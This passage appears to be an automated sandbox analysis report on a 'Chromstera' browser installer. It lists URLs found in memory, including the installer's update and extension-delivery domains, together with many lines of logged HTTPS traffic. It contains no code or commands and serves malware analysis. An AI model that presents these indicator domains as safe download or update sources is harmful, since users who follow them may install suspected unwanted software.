                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.coT
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: setup.exe, 00000003.00000002.2949076148.0000000001418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: setup.exe, 00000000.00000002.2947792142.000000000084A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: setup.exe, 00000003.00000002.2949076148.0000000001418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab(
                      Source: setup.exe, 00000000.00000003.1716107883.0000000003C34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9fe3082f81c28
                      Source: setup.exe, 00000000.00000002.2947792142.0000000000899000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en_
                      Source: svchost.exe, 0000001B.00000002.2953199591.00000278DA484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/
                      Source: svchost.exe, 0000001B.00000002.2953199591.00000278DA484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/.exe
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA268000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA268000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                      Source: qmgr.db.27.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.27.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA268000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA268000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA29D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: svchost.exe, 0000001B.00000002.2953199591.00000278DA461000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2953324273.00000278DA4D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0/go
                      Source: svchost.exe, 0000001B.00000002.2953199591.00000278DA484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/l
                      Source: svchost.exe, 0000001B.00000002.2953104557.00000278DA42D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80/edgedl/release2/chrome_component/e6xlmsu5i2bokri3w4cyuhv4nq_2024.8.10.0
                      Source: svchost.exe, 0000001B.00000002.2953199591.00000278DA461000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com:80I
                      Source: qmgr.db.27.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: shi3105.tmp.0.drString found in binary or memory: http://html4/loose.dtd
                      Source: powershell.exe, 00000006.00000002.1826666135.0000025210075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1826666135.00000252101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1922851954.00000248902B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1922851954.00000248903F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2048653111.000001BA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: setup.exe, 00000000.00000002.2952389573.0000000005B80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr60;
                      Source: powershell.exe, 0000000E.00000002.1956633566.000001BA00233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1860654492.0000024880241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1956633566.000001BA00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201B3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.chromstera.com
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45codesignca2020.crt0=
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt06
                      Source: powershell.exe, 0000000E.00000002.1956633566.000001BA00233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: setup.exeString found in binary or memory: http://www.google.com
                      Source: setup.exeString found in binary or memory: http://www.yahoo.com
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1860654492.0000024880241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1956633566.000001BA00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1741315776.0000000004162000.00000004.00000020.00020000.00000000.sdmp, ChromsteraUpdater.exe, 00000008.00000003.1798424714.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810981504.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txt
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txt$T
                      Source: setup.exe, 00000003.00000003.1746081224.0000000005133000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txt8
                      Source: setup.exe, 00000000.00000003.1699493565.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtAI_NEWERPRODUCTFOUND
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtDS
                      Source: setup.exe, 00000000.00000003.2315981321.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2951194145.0000000003C75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2317680666.0000000003C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtN
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtater.
                      Source: setup.exe, 00000000.00000003.1719360172.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1719465037.00000000062DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtr
                      Source: setup.exe, 00000003.00000002.2952383643.0000000005110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtromstera
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.000000000064D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810981504.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txt
                      Source: setup.exe, 00000003.00000003.1741315776.0000000004162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txtB3
                      Source: setup.exe, 00000000.00000003.1699493565.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txtCheckFrequencyDownloads
                      Source: setup.exe, 00000000.00000002.2950690414.0000000003C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txtY0
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txtl
                      Source: setup.exe, 00000000.00000003.1699659793.0000000000909000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1699730264.000000000092C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1699769061.0000000000937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txttd
                      Source: powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA36A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA2F3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA344000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA338000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA357000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: powershell.exe, 0000000E.00000002.1956633566.000001BA00233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025200C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1860654492.0000024880E74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1956633566.000001BA00C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 0000000A.00000002.1929021569.00000248983C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                      Source: powershell.exe, 00000006.00000002.1826666135.0000025210075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1826666135.00000252101B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1922851954.00000248902B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1922851954.00000248903F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2048653111.000001BA10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA2C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.c
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmp, setup.exe, Chromnius-Main.msi.0.drString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4&time=
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025201A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.chromstera.com/cross/crx3dynamic/?adv=426&v=4.4&time=1730139128
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000002.2952383643.0000000005110000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000002.2949076148.00000000013CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.com
                      Source: setup.exe, Chromnius-Main.msi.0.drString found in binary or memory: https://www.chromstera.com/installer/
                      Source: setup.exe, Chromnius-Main.msi.0.drString found in binary or memory: https://www.chromstera.comARPSYSTEMCOMPONENTARPURLINFOABOUTARPURLUPDATEINFOExtractFilesFirstWindowsT
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comM
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comT
                      Source: setup.exe, 00000000.00000003.1719741857.0000000003CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comY
                      Source: setup.exe, 00000000.00000003.2315731246.00000000062E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.combmp
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comh
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.commu
                      Source: setup.exe, 00000000.00000003.2315731246.00000000062E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.compl
                      Source: setup.exe, 00000000.00000002.2952714019.000000000628A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comrT/
                      Source: setup.exe, 00000000.00000002.2952714019.000000000628A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.chromstera.comz
                      Source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.drString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59265 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59162 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59185 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59288 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59308
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59304
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59307
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59207 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59242 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59306
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59312
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59311
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59310
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59202
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59253 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59196 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59204
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59203
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59299 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59310 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59200
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59219 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59209
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59206
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59205
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59208
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59207
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59213
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59212
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59215
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59197 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59214
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59211
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59311 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59210
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59231 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59287 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59163 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59217
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59216
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59220 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59206 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59219
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59218
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59224
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59223
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59226
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59276 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59225
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59220
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59222
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59221
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59195 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
